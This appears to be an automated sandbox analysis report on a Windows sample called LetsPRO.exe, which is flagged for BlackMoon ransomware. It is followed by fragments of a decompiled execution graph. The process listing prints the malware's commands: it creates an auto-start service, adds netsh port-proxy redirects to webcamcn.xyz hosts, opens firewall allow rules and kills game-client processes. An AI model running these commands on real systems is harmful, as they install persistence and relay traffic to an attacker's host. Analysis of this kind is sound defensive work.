                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\ChromeSetup.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\ChromeSetup.exe"
                                      Imagebase:0x10000
                                      File size:1'376'816 bytes
                                      MD5 hash:8884A9547AA410B697EFAD097F2B0013
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:17
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:12:52:58
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:12:52:59
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001D.00000002.2130966068.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:12:53:03
                                      Start date:26/04/2024
                                      Path:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
                                      Imagebase:0x120000
                                      File size:162'080 bytes
                                      MD5 hash:BAF0B64AF9FCEAB44942506F3AF21C87
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:31
                                      Start time:12:53:07
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:12:53:27
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff7214b0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:12:53:28
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff74c1b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:12:53:28
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff7214b0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:12:53:28
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:37
                                      Start time:12:53:30
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe cscript C:\Users\user\99944\144977.vbs
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:38
                                      Start time:12:53:32
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
                                      Imagebase:0x7ff664e80000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:39
                                      Start time:12:53:33
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:12:53:33
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:41
                                      Start time:12:53:34
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:42
                                      Start time:12:53:34
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:43
                                      Start time:12:53:35
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:44
                                      Start time:12:53:35
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
                                      Imagebase:0x7ff7517b0000
                                      File size:96'768 bytes
                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:45
                                      Start time:12:53:36
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /f /t /im wegame.exe
                                      Imagebase:0x7ff6aa9b0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:46
                                      Start time:12:53:36
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\taskkill.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskkill /f /t /im WeGame.exe
                                      Imagebase:0x7ff6aa9b0000
                                      File size:101'376 bytes
                                      MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:15.8%
                                        Dynamic/Decrypted Code Coverage:97.2%
                                        Signature Coverage:18.2%
                                        Total number of Nodes:1569
                                        Total number of Limit Nodes:47
                                        execution_graph 12369 3f4c1f7 12377 3f44300 12369->12377 12371 3f4c203 __lock 12376 3f4c216 12371->12376 12373 3f4c24a DeleteCriticalSection 12375 3f3f639 _free 3 API calls 12373->12375 12374 3f4c275 __fcloseall ___BuildCatchObject 12375->12376 12376->12373 12376->12374 12378 3f4d061 12376->12378 12377->12371 12379 3f4d06d ___BuildCatchObject 12378->12379 12380 3f4d094 12379->12380 12381 3f4d07f 12379->12381 12383 3f4d0a7 __lock_file 12380->12383 12389 3f4d08f ___BuildCatchObject 12380->12389 12382 3f3f91b __controlfp_s __getptd_noexit 12381->12382 12384 3f4d084 12382->12384 12390 3f4cff4 12383->12390 12386 3f420e2 __controlfp_s 11 API calls 12384->12386 12386->12389 12389->12376 12391 3f4d005 12390->12391 12392 3f4d019 12390->12392 12393 3f3f91b __controlfp_s __getptd_noexit 12391->12393 12398 3f4d015 12392->12398 12409 3f4c293 12392->12409 12394 3f4d00a 12393->12394 12396 3f420e2 __controlfp_s 11 API calls 12394->12396 12396->12398 12406 3f4d0cd 12398->12406 12402 3f4d033 12425 3f4f7f1 12402->12425 12404 3f4d039 12404->12398 12405 3f3f639 _free 3 API calls 12404->12405 12405->12398 12496 3f49eeb 12406->12496 12408 3f4d0d3 12408->12389 12410 3f4c2d5 12409->12410 12411 3f4c2ac 12409->12411 12414 3f4f8b5 12410->12414 12411->12410 12412 3f49f56 __flsbuf 12 API calls 12411->12412 12413 3f4c2c7 __write 12412->12413 12413->12410 12415 3f4f8c5 12414->12415 12416 3f4d02d 12414->12416 12415->12416 12417 3f3f639 _free 3 API calls 12415->12417 12418 3f49f56 12416->12418 12417->12416 12419 3f49f77 12418->12419 12420 3f49f62 12418->12420 12419->12402 12421 3f3f91b __controlfp_s __getptd_noexit 12420->12421 12422 3f49f67 12421->12422 12423 3f420e2 __controlfp_s 11 API calls 12422->12423 12424 3f49f72 12423->12424 12424->12402 12426 3f4f7fd ___BuildCatchObject 12425->12426 12427 3f4f805 12426->12427 12430 3f4f820 12426->12430 12429 3f3f92e __free_osfhnd __getptd_noexit 12427->12429 12428 3f4f82c 12431 3f3f92e __free_osfhnd __getptd_noexit 12428->12431 12432 3f4f80a 12429->12432 12430->12428 12434 3f4f866 12430->12434 12433 3f4f831 12431->12433 12435 3f3f91b __controlfp_s __getptd_noexit 12432->12435 12436 3f3f91b __controlfp_s __getptd_noexit 12433->12436 12448 3f4c0ef 12434->12448 12444 3f4f812 ___BuildCatchObject 12435->12444 12438 3f4f839 12436->12438 12440 3f420e2 __controlfp_s 11 API calls 12438->12440 12439 3f4f86c 12441 3f4f886 12439->12441 12442 3f4f87a 12439->12442 12440->12444 12443 3f3f91b __controlfp_s __getptd_noexit 12441->12443 12455 3f4f755 12442->12455 12446 3f4f880 12443->12446 12444->12404 12470 3f4f8ad 12446->12470 12449 3f4c0fb ___BuildCatchObject 12448->12449 12450 3f4c120 __lock 12449->12450 12454 3f4c143 ___lock_fhandle 12449->12454 12451 3f4c130 InitializeCriticalSectionAndSpinCount 12450->12451 12450->12454 12451->12454 12452 3f4c177 ___BuildCatchObject 12452->12439 12453 3f4c15a EnterCriticalSection 12453->12452 12454->12452 12454->12453 12473 3f4c086 12455->12473 12457 3f4f7bb 12486 3f4c000 12457->12486 12459 3f4f765 12459->12457 12460 3f4f799 12459->12460 12463 3f4c086 __close_nolock 13 API calls 12459->12463 12460->12457 12461 3f4c086 __close_nolock 13 API calls 12460->12461 12464 3f4f7a5 CloseHandle 12461->12464 12466 3f4f790 12463->12466 12464->12457 12467 3f4f7b1 GetLastError 12464->12467 12465 3f4f7e5 12465->12446 12469 3f4c086 __close_nolock 13 API calls 12466->12469 12467->12457 12468 3f3f941 __dosmaperr 2 API calls 12468->12465 12469->12460 12495 3f4c18e LeaveCriticalSection 12470->12495 12472 3f4f8b3 12472->12444 12474 3f4c093 12473->12474 12476 3f4c0ab 12473->12476 12475 3f3f92e __free_osfhnd __getptd_noexit 12474->12475 12478 3f4c098 12475->12478 12477 3f3f92e __free_osfhnd __getptd_noexit 12476->12477 12480 3f4c0ea 12476->12480 12479 3f4c0bc 12477->12479 12481 3f3f91b __controlfp_s __getptd_noexit 12478->12481 12482 3f3f91b __controlfp_s __getptd_noexit 12479->12482 12480->12459 12483 3f4c0a0 12481->12483 12484 3f4c0c4 12482->12484 12483->12459 12485 3f420e2 __controlfp_s 11 API calls 12484->12485 12485->12483 12487 3f4c06c 12486->12487 12490 3f4c011 12486->12490 12488 3f3f91b __controlfp_s __getptd_noexit 12487->12488 12489 3f4c071 12488->12489 12491 3f3f92e __free_osfhnd __getptd_noexit 12489->12491 12490->12487 12494 3f4c03c 12490->12494 12492 3f4c062 12491->12492 12492->12465 12492->12468 12493 3f4c05c SetStdHandle 12493->12492 12494->12492 12494->12493 12495->12472 12497 3f49efc 12496->12497 12498 3f49f1b LeaveCriticalSection 12496->12498 12497->12498 12499 3f49f03 12497->12499 12498->12408 12499->12408 11040 3f411f2 11041 3f41202 11040->11041 11042 3f411fd 11040->11042 11046 3f410fc 11041->11046 11058 3f48262 11042->11058 11045 3f41210 11047 3f41108 ___BuildCatchObject 11046->11047 11048 3f41155 11047->11048 11056 3f411a5 ___BuildCatchObject 11047->11056 11062 3f40f98 11047->11062 11048->11056 11103 3f3e480 11048->11103 11052 3f41185 11054 3f40f98 __CRT_INIT@12 67 API calls 11052->11054 11052->11056 11053 3f3e480 ___DllMainCRTStartup 412 API calls 11055 3f4117c 11053->11055 11054->11056 11057 3f40f98 __CRT_INIT@12 67 API calls 11055->11057 11056->11045 11057->11052 11059 3f48294 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 11058->11059 11060 3f48287 11058->11060 11061 3f4828b 11059->11061 11060->11059 11060->11061 11061->11041 11063 3f40fa4 ___BuildCatchObject 11062->11063 11064 3f41026 11063->11064 11065 3f40fac 11063->11065 11066 3f41087 11064->11066 11070 3f4102c 11064->11070 11107 3f41a1b HeapCreate 11065->11107 11069 3f4108c ___set_flsgetvalue __calloc_crt 11066->11069 11071 3f410e5 11066->11071 11068 3f40fb1 11072 3f40fbc 11068->11072 11081 3f40fb5 ___BuildCatchObject 11068->11081 11073 3f410a9 DecodePointer 11069->11073 11069->11081 11074 3f4105e 11070->11074 11075 3f4104f __ioterm __mtterm 11070->11075 11070->11081 11071->11081 11178 3f43fa6 11071->11178 11108 3f44014 GetModuleHandleW 11072->11108 11082 3f410be 11073->11082 11168 